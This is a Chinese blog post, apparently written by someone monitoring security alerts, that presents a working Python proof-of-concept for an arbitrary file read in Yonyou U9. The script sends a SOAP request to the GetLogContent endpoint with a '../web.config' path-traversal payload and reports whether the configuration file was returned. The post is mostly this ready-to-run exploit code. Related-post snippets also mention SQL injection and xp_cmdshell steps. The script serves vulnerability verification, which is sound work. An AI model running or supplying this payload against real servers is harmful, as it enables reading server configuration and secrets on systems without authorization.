Python-Poc编写(4)

于 2024-08-19 14:02:18 发布
阅读量168 收藏
点赞数
分类专栏: python-poc编写 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53884648/article/details/141323819
版权

一、背景

值守期间遇到产品waf上很多的任意读取文件告警;查看为用友U9产品随机有了该漏洞的验证POC。

二、POC编写

import argparse
import requests
import sys

# 创建poc模块接收参数
def cmd(url):
    # 创建payliad
    payload = "/OnLine/UMWebService.asmx?op=GetLogContent"
    url1 = f"{url}{payload}"
    headers = {
        'Content-Type': 'text/xml; charset=utf-8',
        'Content-Length': "length",
        'SOAPAction': "http://tempuri.org/GetLogContent"
    }
    data = f'''<?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
        <soap:Body>
            <GetLogContent xmlns="http://tempuri.org/">
            <fileName>../web.config</fileName>
            </GetLogContent>
        </soap:Body>
        </soap:Envelope>
            '''
    try:
        r = requests.post(url1,headers=headers, data=data,verify=False, timeout=5)
        if "UFSoft.UBF.UI" in r.text:
            print(f"[*]{url1}\n存在任意文件读取漏洞")
        else:
            print(f"[-]{url1}\n不存在任意文件读取漏洞")
    except Exception as e:
        # 异常回复
        print(f"[-]{url}存在异常,请检查!!!")
        sys.exit(1)  # 异常退出


def main():
    # 字符画
    banner = """
  _____        _          _____            _    
 |  __ \      | |        |  __ \          | |   
 | |  | | __ _| |_ __ _  | |__) |__ _  ___| | __
 | |  | |/ _` | __/ _` | |  _  // _` |/ __| |/ /
 | |__| | (_| | || (_| | | | \ \ (_| | (__|   < 
 |_____/ \__,_|\__\__,_| |_|  \_\__,_|\___|_|\_\
 
作者:添衣&吹風  地址:https://blog.csdn.net/weixin_53884648

        """
    print(banner)
    print("用友U9产品漏洞")
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", dest="url", required=True, default=None, help="请输入url地址")
    # parser.add_argument("-p","--port",type=int,help="请输入端口")
    # parser.add_argument("-c",dest="cmd",required=False,type=str,default="whoami",help="输入执行命令")
    args = parser.parse_args()
    cmd(args.url)


if __name__ == '__main__':
    main()

添衣&吹風
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python编写poc_Poc编写
weixin_39619635的博客
01-14 1157
0x01 PoCPoC(全称: Proof of Concept), 又叫概念验证。作为我们的漏洞验证程序,他可能是一段不完整的程序,仅仅是为了证明我们提出漏洞的观点。推荐使用Python编写PoC,因为安全界用 Python 的人居多,写的东西能被更多人看懂,并且 Python 这门语言的灵活,类库强大等特性,给编写的人提供了很大便利。Exp(全称: Exploit),又叫漏洞利用程序。比如目标...
Python--poc编写(1)
2401_84011114的博客
04-07 204
执行命令:exec master…xp_cmdshell “tasklist”2.4、之后判断是否开启xp_cmdshell,进行提权利用。2.2、通过code参数在gettoken获取token。2.1、通过getenterprise获取code。以下验证程序待官方补丁出来后进行公布!2.3、通过doquery进行sql注入。开启xp_cmdshell。
Python--poc编写(2)
weixin_53884648的博客
03-29 481
kkFileView 文档管理系统#任意文件读取 #1day#漏洞poc编写
Python--poc编写(3)
weixin_53884648的博客
04-01 370
用于批量验证以及自查漏洞
python编写poc_POC编写基础知识
weixin_29405101的博客
12-23 3357
什么是 PoCPoC(全称: Proof of Concept), 中文译作概念验证。在安全界,你可以理解成为漏洞验证程序,和一些应用程序相比,PoC 是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码什么是 ExpExp(全称: Exploit),中文叫漏洞利用程序。名字上说的已经很清楚了,简单讲,就是一段可以发挥漏洞价值的程序,这话感觉和没说一样。想象一下这样的场景,目标存在一个 SQL...
PythonPOC编写
qq_59923059的博客
08-15 1834
PythonPOC编写入门
python编写poc_分享使用python编写poc,exp的实例教程
weixin_31542609的博客
01-14 1730
在很久很久以,我有一个梦想 但是,后来我发现我的梦想渐渐没有了于是,昨天我思考了一晚上觉得我应该有个梦想的!好了,回到正题。正所谓明人不装暗逼,今天我家开通了公网ip我开森啊,很开森的那种!额,又跑题了下面我们真的开始了:0x01先来简单看看鞋poc,exp的思路吧:首先,我们需要知道这个漏洞,也就是发现漏洞然后,我们需要知道这个漏洞原理,也就是了解原理其次,我们需要搭建环境,或者是网上找环境了解...
python攻防---初次编写poc
qq_53003652的博客
08-13 259
今天在hvv,rt可能因为周末没有多少告警研判,没什么事情做,作为一名蓝队高级工程师(狗头)!我不想做脚本小子了,就来简单的写一个poc入门吧,关注一下,后续还会陆续更新哦。本地搭建DVWA靶场,尝试给DVWA中的命令执行模块写一个poc这里应该是php版本导致的乱码,没有什么影响。
利用python编写简易POC脚本
haosha。的博客
01-30 2799
利用python语言编写简易POC脚本
python-poc:该存储库包含python的基本演示代码
03-07
10. **Jupyter Notebook**:这是一种交互式开发环境,适合编写和展示Python代码,特别适合数据分析和教学。 "python-poc-master"这个压缩包可能包含了上述各个方面的基础示例代码,例如简单的变量赋值、数据类型...
Some-PoC-oR-ExP:各种漏洞poc、Exp的收集或编写
04-28
Python作为标签,意味着大部分的PoC和Exp可能使用Python语言编写Python因其简洁明了的语法和丰富的库支持,成为了安全研究者常用的工具。例如,它可以用来构造HTTP请求,模拟用户交互,甚至创建复杂的内存操作,...
Python-PoC代码用于从Windows10内置的sshagent服务中提取私钥
08-12
4. Python `subprocess` 模块 5. `paramiko` 库用于SSH通信 6. `win32security` 模块处理Windows安全 7. 安全审计与漏洞利用的概念 对于开发人员和系统管理员来说,理解这些知识点可以帮助他们更好地保护自己的系统...
R-poc
03-27
4. **Web框架交互**:Python有许多用于Web开发的框架,如Flask、Django等,R-poc可能涉及与这些框架的交互,通过发送特定请求来测试漏洞。 5. **网络爬虫**:Python的 `requests` 和 `BeautifulSoup` 等库可用于...
Sample-ML-POC
03-25
综上所述,"Sample-ML-POC"项目可能是围绕Python进行的一个事件预测实践,涵盖了数据预处理、特征选择、模型训练、评估和优化等机器学习核心环节。压缩包中的"Sample-ML-POC-main"可能包含了项目的主代码文件、数据...
Python】入门到放弃之第九章《字典》
MP13537560060的博客
08-15 728
这是本系列的第九章节内容,《字典》。在Python中,字典(Dictionary)是一种内置的数据结构,用于存储键值对(key-value pairs)。字典是可变的,意味着你可以在创建字典后添加、删除或修改其中的元素。字典的键(key)必须是唯一的,并且是不可变的(即,它们必须是不可变数据类型,如字符串、数字或元组,但不能是列表或字典等可变类型)。字典的值(value)则可以是任何数据类型,包括列表、元组、字典等。以上,就是Python中字典的全部内容。
C++_基本语法笔记_模板
qq_45629864的博客
08-14 460
思想是Java里的泛型(不确定用什么类型的数据)这里template这一句,意思是声明T是泛型,后面写用到泛型T的函数。建议都用应用场景:不同数据类型的交换函数。
Python使用】嘿马头条项目从到完整开发教程第1篇:简介,1. 内容【附代码文档】
一诺的博客
08-16 630
本教程的知识点为:简介 1. 内容 2. 目标 产品效果 ToutiaoWeb虚拟机使用说明 数据库 理解ORM 作用 思考: 使用ORM的方式选择 数据库 SQLAlchemy操作 1 新增 2 查询 all() 数据库 分布式ID 1 方案选择 2 头条 使用雪花算法 (代码 toutiao-backend/common/utils/snowflake) 数据库 Redis 1 Redis事务 基本事务指令 Python客户端操作 Git工用流 调试方法 JWT认证方案 JWT & JWS & JWE
湖北师范大学-Python程序设计-3.1 中国古代数学问题(project)
最新发布
柠檬喝汽水的博客
08-19 470
唐朝时,一斗酒的斗所采用的度量是小斗,也就是4斤,当时一斤取值范围大约在500多到600克左右,换算一下可知唐朝一斗酒的重量取值范围在2000克到2400克左右。有一座八层宝塔,每一层都有一些琉璃灯,每一层的灯数都是上一层的二倍,已知共有 765 盏琉璃灯,计算并输出每层各有多少盏琉璃灯。输出不超过 n 且满足条件的物品个数 m,如果有多个解,则分行输出,每行一个解;第二行输出 2 个浮点数,依次为小鼠和大鼠打洞的距离,单位为尺,保留小数点后 1 位数字。一个浮点数 f,表示李白的酒壶原来有 f 斗酒。
python编写poc脚本
10-11
编写 Python POC(Proof of Concept)脚本时,您需要先确定攻击目标和漏洞类型。然后,您可以使用适当的库和模块来构建脚本。以下是一个示例脚本,用于检测目标是否存在一个简单的HTTP服务,并输出其响应状态码: ```python import requests target_url = "http://example.com" # 替换为目标URL try: response = requests.get(target_url) if response.status_code == 200: print("目标存在漏洞") else: print("目标不具备漏洞") except requests.exceptions.RequestException: print("无法连接到目标") ``` 请注意,这只是一个简单的示例,具体的脚本编写取决于您的需求和攻击目标。您可能需要在脚本中添加更复杂的逻辑和功能,以便进行更详细的漏洞检测和利用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值